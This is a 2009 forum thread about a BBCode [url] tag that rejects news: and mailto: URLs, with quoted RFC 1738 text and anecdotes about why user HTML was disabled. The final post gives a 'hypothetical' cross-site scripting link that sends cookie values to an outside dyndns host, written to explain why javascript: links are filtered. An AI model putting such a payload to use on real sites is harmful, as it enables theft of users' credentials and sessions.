[url] tag doesn't recognize news: URLs

blargg · Post by **blargg** » Sun Feb 22, 2009 7:06 am

The tag doesn't recognize URLs using the n ... ample.com/
https://example.com/
ftp://example.com/
[url=news:alt.test]news:alt.test[/url] (see section 3.6 of RFC 1738)
[url=news:foo@bar]news:foo@bar[/url]

Pretty ironic, given that USENET is the biggest discussion forum in existence...

funkyass · Post by **funkyass** » Sun Feb 22, 2009 7:48 am

blarg, its news://

its a URI dude.

Post by **grinvader** » Sun Feb 22, 2009 8:55 am

For a bypass, use a tinyurl in the tag.

blargg · Post by **blargg** » Sun Feb 22, 2009 9:40 pm

funkyass wrote:blarg, its news://
its a URI dude.

Dude, did you even read the RFC I linked to?

Code: Select all

3.6. NEWS

   The news URL scheme is used to refer to either news groups or
   individual articles of USENET news, as specified in RFC 1036.

   A news URL takes one of two forms:

     news:<newsgroup-name>
     news:<message-id>

Just for reference, here's http and mailto:

Code: Select all

3.3. HTTP

   The HTTP URL scheme is used to designate Internet resources
   accessible using HTTP (HyperText Transfer Protocol).

   The HTTP protocol is specified elsewhere. This specification only
   describes the syntax of HTTP URLs.

   An HTTP URL takes the form:

      http://<host>:<port>/<path>?<searchpart>

[...]

3.5. MAILTO

   The mailto URL scheme is used to designate the Internet mailing
   address of an individual or service. No additional information other
   than an Internet mailing address is present or implied.

   A mailto URL takes the form:

        mailto:<rfc822-addr-spec>
[...]

[url=mailto:example@example.com]mailto:example@example.com[/url] (looks like mailto doesn't work either)

Looking at the RFC for a URI, I don't see anything that changes how news resource links are encoded.

Tallgeese · Post by **Tallgeese** » Sun Feb 22, 2009 9:55 pm

URL tag parasers have the nasty habit of automatically inserting http:// at the statrt if they don't see it.

They do this so the forum doesn't confuse something like www.blah.net as a relative link.

They'd have to change the PHP files to fix that.

blargg · Post by **blargg** » Sun Feb 22, 2009 10:22 pm

The ftp:// link example in my first post works fine, without http:// being inserted. It looks more like the code that determines whether the [url= tag is valid requires that it have a double slash near the beginning of the URL, even though the format seems more along the lines of <protocol>:<protocol-specific string>.

kode54 · Post by **kode54** » Sun Feb 22, 2009 10:36 pm

There's a separate [email] tag for mailto: links. Formatted [email]user@host[/email]. Also, the BBCode documentation is wrong on the [email] tag, its example link is a emailto: address, which is invalid.

Tallgeese · Post by **Tallgeese** » Mon Feb 23, 2009 12:38 am

I honestly don't understand why URL BBcode checks for http:// or ftp:// or what have you.

I mean, if they screw it up, let them screw it up.

blargg · Post by **blargg** » Mon Feb 23, 2009 1:19 am

Just to be clear, I'm not commenting on automatic conversion of URLs to links, which I too don't really care for, since it clutters the text with the full URL. I'm commenting on explicit use of the tag, and how it fails to work with URLs ... ]some text into <a href="....">some text</a>.

Tallgeese · Post by **Tallgeese** » Mon Feb 23, 2009 1:29 am

The reason it doesn't blindly convert is because it is possible to insert javascript that way, just so you know.

Post by **grinvader** » Mon Feb 23, 2009 1:39 am

Note that we could enable html for users, but I was around back in the "goatse on hover" days and I don't really want it to happen again.

Tallgeese · Post by **Tallgeese** » Mon Feb 23, 2009 2:46 am

grinvader wrote:Note that we could enable html for users, but I was around back in the "goatse on hover" days and I don't really want it to happen again.

Er... do you mean hovering on top of links that are goatse?

sweener2001 · Post by **sweener2001** » Mon Feb 23, 2009 3:29 am

that scarred me

byuu · Post by **byuu** » Mon Feb 23, 2009 3:40 am

grinvader wrote:Note that we could enable html for users, but I was around back in the "goatse on hover" days and I don't really want it to happen again.

Ever see the spawning popup variation? Click a link, get a shock image popup. Close the window and it spawns two more. Close one of those, you get the idea.

I feel really bad for those who didn't know how to end task a process.

adventure_of_link · Post by **adventure_of_link** » Mon Feb 23, 2009 3:53 am

I thought it was because people kept inserting HTML code to force an auto redirection to goatse in X seconds.

that, and changing the title of the page (in your titlebar on the web browser that is.)

in any case, I believe the HTML inserts have been improved to only allow things like <embed></embed>, <a href="url heer">hyperlink</a>, <img src="image url heer"></img>

etc etc etc.

Post by **grinvader** » Mon Feb 23, 2009 6:56 am

Sadly, it's either full html abuse or none. And none it is.

Metatron wrote:Er... do you mean hovering on top of links that are goatse?

No, goatse popups on hover.

Gil_Hamilton · Post by **Gil_Hamilton** » Mon Feb 23, 2009 8:28 am

adventure_of_link wrote:I thought it was because people kept inserting HTML code to force an auto redirection to goatse in X seconds. that, and changing the title of the page (in your titlebar on the web browser that is.)

If I recall correctly...

In OUR case, it was disabled after a thread created to test the limits of HTML within Ikonboard, I believe it was. The purple board that replaced ye olde WWWBoard.

The thread in question went from a thread with an embedded Zero Wing video to an incomrephensible mess of out -of-order posts, posts to the side of each other, posts on top of each other, posts overlapping each other, images every which way, with over a dozen copies of the Zero Wing video embedded, along with God knows whatever else.

HTML in posts was disabled within a day, as the fact that it was an INCREDIBLY bad idea was illustrated quite effectively.

Looking back, I truly wish I had saved the thread.

Post by **grinvader** » Mon Feb 23, 2009 8:03 pm

You forgot "whole posts in their own title field".

blargg · Post by **blargg** » Mon Feb 23, 2009 11:32 pm

Metatron wrote:The reason it doesn't blindly convert is because it is possible to insert javascript that way, just so you know.

So someone could insert a link that was <a href="javascript:...">? How is that any different than a link to another page which has said javascript on it? Either way, the link must be clicked to activate it. Obviously the [url=...] tag must not accept quotes or ] within the ... string, but that's just to ensure it generates valid HTML from a [url] tag.

byuu · Post by **byuu** » Mon Feb 23, 2009 11:54 pm

blargg wrote:So someone could insert a link that was <a href="javascript:...">? How is that any different than a link to another page which has said javascript on it?

Javascript on the current domain exposes you to cross-site scripting vulnerabilities.

Hypothetical:
<a href="javascript:redirectTo('http://dood.dyndns.org/?logdata=' + document.cookie('PHP_USER') + '=' + document.cookie('PHP_PASS') + '\n');">Click me</a>

Sure, it's a hash, but dictionary attacks are trivial on those.

We had someone try something similar on jumpstation.org (when it still existed.)